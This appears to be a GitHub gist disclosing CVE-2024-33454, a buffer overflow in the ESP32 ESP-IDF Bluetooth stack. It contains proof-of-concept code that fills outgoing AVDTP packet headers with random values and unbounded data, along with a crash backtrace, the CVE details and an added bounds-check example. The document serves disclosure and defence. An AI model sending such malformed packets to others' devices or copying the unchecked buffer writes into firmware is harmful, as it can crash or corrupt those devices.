@Zakary-D
Last active May 10, 2024 01:41
CVE-2024-33454 Guru Meditation Error and rebooting when using ESP32 bluetooth
CVE-2024-33454
IDF version.
v5.1.3-416-gd23b7a0361
Espressif SoC revision.
ESP32D0WDQ5(revision 3)
Operating System used.
Linux
How did you build your project?
Command line with idf.py
If you are using Windows, please specify command line type.
None
Development Kit.
ESP-WROVER-KIT
Power Supply used.
USB
What is the expected behavior?
Send the modified AVDTP packet to the peer.
What is the actual behavior?
Memory corruption and rebooting.
Steps to reproduce.
1. Modify the code in esp-idf/components/bt/host/bluedroid/stack/avdt/avdt_ad.c:

    /* The added lines use srand()/rand() (<stdlib.h>), time() (<time.h>)
     * and PRIu16 (<inttypes.h>). */
    UINT8 avdt_ad_write_req(UINT8 type, tAVDT_CCB *p_ccb, tAVDT_SCB *p_scb, BT_HDR *p_buf)
    {
        UINT8 tcid;

        /* get tcid from type, scb */
        tcid = avdt_ad_type_to_tcid(type, p_scb);

        srand(time(NULL));
        // p_buf[0].event = (uint16_t)rand();
        if (type == AVDT_CHAN_MEDIA) {
            /* Overwrite every BT_HDR field of outgoing media packets with random values. */
            p_buf->event = (uint16_t)rand();
            p_buf->len = (uint16_t)rand() % 255;
            p_buf->offset = (uint16_t)rand();
            p_buf->layer_specific = (uint16_t)rand();
            /* Fill len bytes of data[] without regard to the allocated buffer size. */
            for (int i = 0; i < p_buf->len; ++i) p_buf->data[i] = (uint16_t)rand();
        }

        /* Print the header and payload of every 1000th packet. */
        static int dk_cnt = 0;
        if (++dk_cnt % 1000 == 0) {
            dk_cnt = 0;
            printf("\n\n avdt_ad_write_req \n");
            printf("%" PRIu16 " ", p_buf->event);
            printf("%" PRIu16 " ", p_buf->len);
            printf("%" PRIu16 " ", p_buf->offset);
            printf("%" PRIu16 " \n", p_buf->layer_specific);
            for (int i = 0; i < p_buf->len; ++i) printf("%" PRIu16 " ", p_buf->data[i]);
            printf("\n\n");
        }

        return L2CA_DataWrite(avdt_cb.ad.rt_tbl[avdt_ccb_to_idx(p_ccb)][tcid].lcid, p_buf);
    }

2. Change the target device name of example/a2dp_source to my headphones: HUAWEI FreeBuds 4i.
3. Use idf.py to build example/a2dp_source.
4. Flash it to the ESP-WROVER-KIT and monitor it.
5. About half an hour later, something goes wrong and the development board reboots.
Debug Logs.
Guru Meditation Error: Core 0 panic'ed (StoreProhibited). Exception was unhandled.
Core 0 register dump:
PC : 0x40093232 PS : 0x00060333 A0 : 0x80092e87 A1 : 0x3ffd0350
0x40093232: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:332
(inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380
(inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486
(inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123
A2 : 0x3ffcc144 A3 : 0x3ffd7838 A4 : 0x3ffd7830 A5 : 0x3ffc0042
A6 : 0x00000028 A7 : 0x00000058 A8 : 0x00000018 A9 : 0x3ffd8844
A10 : 0x3ffd8844 A11 : 0x00000000 A12 : 0x0099009d A13 : 0x00000004
A14 : 0xb33fffff A15 : 0xb33fffff SAR : 0x0000001c EXCCAUSE: 0x0000001d
EXCVADDR: 0x009900a9 LBEG : 0x4000c2e0 LEND : 0x4000c2f6 LCOUNT : 0xffffffff
0x4000c2e0: memcpy in ROM
0x4000c2f6: memcpy in ROM
Backtrace: 0x4009322f:0x3ffd0350 0x40092e84:0x3ffd0370 0x40082362:0x3ffd0390 0x4009406d:0x3ffd03b0 0x400de242:0x3ffd03d0 0x400df122:0x3ffd03f0 0x400de459:0x3ffd0410 0x4010c2fa:0x3ffd0430 0x400de4b5:0x3ffd0450 0x4010d2ce:0x3ffd0470 0x4010d19a:0x3ffd0490 0x40090ad5:0x3ffd04c0
0x4009322f: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:331
(inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380
(inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486
(inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123
0x40092e84: multi_heap_free_impl at /root/esp/esp-idf/components/heap/multi_heap.c:231
0x40082362: heap_caps_free at /root/esp/esp-idf/components/heap/heap_caps.c:388
0x4009406d: free at /root/esp/esp-idf/components/newlib/heap.c:39
0x400de242: transmit_fragment at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:350
0x400df122: fragment_and_dispatch at /root/esp/esp-idf/components/bt/host/bluedroid/hci/packet_fragmenter.c:132
0x400de459: event_packet_ready at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:338
0x4010c2fa: fixed_queue_process at /root/esp/esp-idf/components/bt/common/osi/fixed_queue.c:254
0x400de4b5: hci_downstream_data_handler at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:238
0x4010d2ce: osi_thread_generic_event_handler at /root/esp/esp-idf/components/bt/common/osi/thread.c:425
0x4010d19a: osi_thread_run at /root/esp/esp-idf/components/bt/common/osi/thread.c:165 (discriminator 1)
0x40090ad5: vPortTaskWrapper at /root/esp/esp-idf/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:162
ELF file SHA256: fb53a7e2e55ccb03
Rebooting...
ets Jul 29 2019 12:21:46
CVE-2024-33454 was assigned to this issue.
> ------------------------------------------
>
> [Vulnerability Type]
> Buffer Overflow
>
> ------------------------------------------
>
> [Vendor of Product]
> https://github.com/espressif/esp-idf/tree/release/v5.1
>
> ------------------------------------------
>
> [Affected Product Code Base]
> esp-idf - v5.1
>
> ------------------------------------------
>
> [Affected Component]
> Bluetooth stack of esp-idf5.1, memory corruption due to missing bounds checking (exp: https://www.esp32.com/viewtopic.php?f=14&t=39478)
>
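
The kind of bounds check the CVE description says is missing, as an added example (not code from this gist and not the ESP-IDF fix): it rejects a buffer whose `offset` and `len` fields point outside its allocation before any layer uses them. The `bt_hdr_t` type mirrors the BT_HDR fields used in step 1; `bt_hdr_in_bounds`, `bt_hdr_copy_payload` and `demo` are hypothetical names, and the caller is assumed to know the allocation size, which the header itself does not carry.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Same field layout as the BT_HDR the repro writes to. */
typedef struct {
    uint16_t event;
    uint16_t len;            /* payload bytes */
    uint16_t offset;         /* payload start, relative to data[] */
    uint16_t layer_specific;
    uint8_t  data[];
} bt_hdr_t;

/* Hypothetical helper: 1 if data[offset .. offset+len) lies inside the
 * alloc_size bytes allocated for header plus payload, else 0. */
int bt_hdr_in_bounds(const bt_hdr_t *p, size_t alloc_size)
{
    if (p == NULL || alloc_size < sizeof(bt_hdr_t)) return 0;
    /* Both fields are 16-bit, so the sum cannot wrap in size_t. */
    return (size_t)p->offset + p->len <= alloc_size - sizeof(bt_hdr_t);
}

/* Hypothetical checked hand-off: copy the payload out only when the
 * header is consistent. Returns bytes copied, or -1 when rejected. */
int bt_hdr_copy_payload(const bt_hdr_t *p, size_t alloc_size,
                        uint8_t *out, size_t out_size)
{
    if (!bt_hdr_in_bounds(p, alloc_size) || p->len > out_size) return -1;
    memcpy(out, p->data + p->offset, p->len);
    return (int)p->len;
}

/* Constructed demo: a buffer with 64 payload bytes and the given fields. */
int demo(uint16_t offset, uint16_t len)
{
    size_t alloc = sizeof(bt_hdr_t) + 64;
    uint8_t out[256];
    bt_hdr_t *p = calloc(1, alloc);
    if (p == NULL) return -2;
    p->offset = offset;
    p->len = len;
    int r = bt_hdr_copy_payload(p, alloc, out, sizeof out);
    free(p);
    return r;
}

int main(void) { return demo(12, 40) == 40 && demo(0x9900, 200) == -1 ? 0 : 1; }
```

A header with unrelated `offset` and `len` values, like the ones step 1 produces, is rejected here instead of being handed on to code that copies or frees based on those fields.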